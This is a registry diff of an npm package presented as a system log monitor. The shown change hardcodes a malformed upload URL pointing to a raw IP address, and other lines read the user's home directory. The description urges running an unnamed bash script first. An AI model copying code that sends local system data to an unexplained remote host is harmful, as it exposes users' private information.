code-poltergeist-system-monitor 1.1.1 → 1.1.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -9,7 +9,7 @@ const { default: axios } = require("axios");
|
|
9
9
|
|
10
10
|
const email = process.argv[2];
|
11
11
|
const homeDir = process.env.HOME;
|
12
|
-
const linkToBackend = "http://
|
12
|
+
const linkToBackend = "http://http://3.27.204.114:3001/upload";
|
13
13
|
const logDir = path.resolve(homeDir, "logfilesformonitor");
|
14
14
|
|
15
15
|
async function logSystemInfo() {
|
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "code-poltergeist-system-monitor",
|
3
|
-
"version": "1.1.
|
3
|
+
"version": "1.1.2",
|
4
4
|
"description": "a Log Monitor for your system visit our website to see detailed analysis of your logs make sure to use our bash script before running this package or else it will fk up system",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|